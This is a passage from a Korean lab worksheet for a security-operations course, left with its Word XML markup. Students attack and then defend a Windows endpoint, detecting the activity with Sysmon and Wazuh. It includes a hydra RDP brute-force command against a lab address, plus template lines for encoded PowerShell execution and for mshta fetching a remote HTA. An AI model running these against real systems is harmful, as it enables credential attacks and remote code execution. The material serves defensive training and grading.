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W3] 엔드포인트 침해(RDP·PowerShell·LOLBAS) vs Sysmon/EDR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medium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보안운영 3주차 — 직원 PC(Windows 엔드포인트, el34-win)를 노린 공격을 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Sysmon + Wazuh(EDR)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>로 탐지한다. 경계 장비(방화벽/IPS/WAF)가 막지 못한 엔드포인트 단계의 위협(RDP 무차별 대입,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>PowerShell 난독 실행, LOLBAS)을 호스트 가시화로 잡는 것이 핵심이다.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공격자 → 엔드포인트 운영자(EDR 탐지·대응)를 한 학생이 수행. 대상=본인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 엔드포인트를 공격, Blue 는 본인 EDR 로 탐지. 대상=상대 인프라.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[외부] RDP 무차별 대입 (엔드포인트 인증 공격)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">당신은 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>망 외부 공격자(외부 공격자 VM 192.168.0.202)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 다. 경계 너머로 노출된 RDP 로 직원 PC 계정에 무차별</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>대입을 시도한다. 다수의 로그온 실패는 Windows 보안 로그(EID 4625)에 남고, Wazuh 가 이를</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>엔드포인트에서 수집한다.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hydra -l Administrator -P /usr/share/wordlists/small.txt rdp://192.168.0.161 -t 2 -f</w:t>
        <w:br/>
        <w:t># 또는 crowbar/ncrack 의 RDP 모듈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>외부 명령 미수집 → **대상 엔드포인트의 Windows 인증 실패 이벤트(EID 4625)가 Wazuh 로 올라온</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>흔적** 으로 채점한다(외부 외부 공격자 VM(192.168.0.202) 명령 로그 불신뢰).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SIEM(Wazuh)에 Windows 인증 실패(RDP/EID 4625) 관련 경보가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[내부 발판] PowerShell 난독 실행 / LOLBAS (침해 후 시뮬레이션)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">⚠️ 이 미션은 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>내부 발판(attacker, SSH 2202)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 을 사용한다 — 공격자가 경계를 이미 통과해</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>엔드포인트에서 코드를 실행하는 *침해 후* 단계를 시뮬레이션한다(외부 공격이 아님을 명시).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">엔드포인트에서 ① PowerShell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>-EncodedCommand</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>(base64 난독) 또는 ② LOLBAS(mshta+http URL)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>를 실행하면, Sysmon 이 프로세스 생성(EID 1)/네트워크(EID 3) 이벤트로 기록하고 Wazuh 가</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>수집한다.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형태 (참고)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>powershell -EncodedCommand &lt;base64&gt;      # 난독 명령 실행</w:t>
        <w:br/>
        <w:t>mshta http://&lt;악성URL&gt;/x.hta             # LOLBAS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 xml:space="preserve">이 행위가 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>엔드포인트 Sysmon 이벤트(EID 1/3)로 Wazuh 에 수집</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 됐는지로 채점한다(내부 발판</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>행위의 호스트 가시화). 외부/내부 공격자 구분을 채점에 혼동하지 않는다 — 신호는 엔드포인트→Wazuh.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SIEM(Wazuh)에 PowerShell 난독 실행 또는 LOLBAS 관련 Sysmon 경보가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엔드포인트가 EDR 감시망에 있는지 확인</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>직원 PC(el34-win)가 Wazuh 에 에이전트로 등록·Active 이고 Sysmon 이 이벤트를 보내고 있는지</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>확인한다(엔드포인트 탐지의 토대).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SIEM 에 Windows 엔드포인트(el34-win) 관련 이벤트/경보 수집 흔적이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RDP 무차별 대입 탐지 (EID 4625)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>RED-1 의 RDP 무차별 대입을 본인 Wazuh 에서 Windows 인증 실패(EID 4625) 경보로 탐지한다.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">보고에 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>구체값</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>(출발지, 노린 계정, 실패 횟수)을 명시한다.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SIEM 에 RDP/Windows 인증 실패 경보가 있고, 그 구체값을 정확히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PowerShell 난독/LOLBAS 탐지 (Sysmon EID 1/3)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>RED-2 의 PowerShell 난독 실행/LOLBAS 를 본인 Wazuh 의 Sysmon 이벤트(EID 1 프로세스 생성,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>EID 3 네트워크)에서 탐지한다. 의심 커맨드라인(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>-EncodedCommand</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>, mshta+http)을 식별한다.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SIEM 에 PowerShell/LOLBAS 관련 Sysmon 경보가 있고, 의심 커맨드라인을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fw)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RDP 노출 차단 (경계에서 엔드포인트 보호)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>엔드포인트 RDP 가 외부에 노출되지 않도록 방화벽에서 외부발 RDP(3389)를 차단한다.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/etc/nftables.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 영속 반영 + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>log prefix "RDP-BLOCK:"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>. 다층 방어(경계+엔드포인트)를 실증.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형태 (참고)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>nft add rule inet six_filter forward tcp dport 3389 ip saddr != 10.20.40.0/24 \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  log prefix "RDP-BLOCK: " drop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채점: /etc/nftables.conf 에 RDP-BLOCK 표식 차단 룰.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합격: /etc/nftables.conf 에 외부 RDP 차단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엔드포인트 사건 타임라인 정리 (analyst 관점)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>RDP 대입 → 엔드포인트 실행으로 이어지는 사건을 Wazuh 이벤트로 시간순 정리한다(누가/언제/무엇).</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>엔드포인트 경보가 SIEM 으로 모여 한 사건으로 재구성되는지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SIEM 에 엔드포인트 사건 경보가 수집돼 있고, 시간순 흐름을 요약했다.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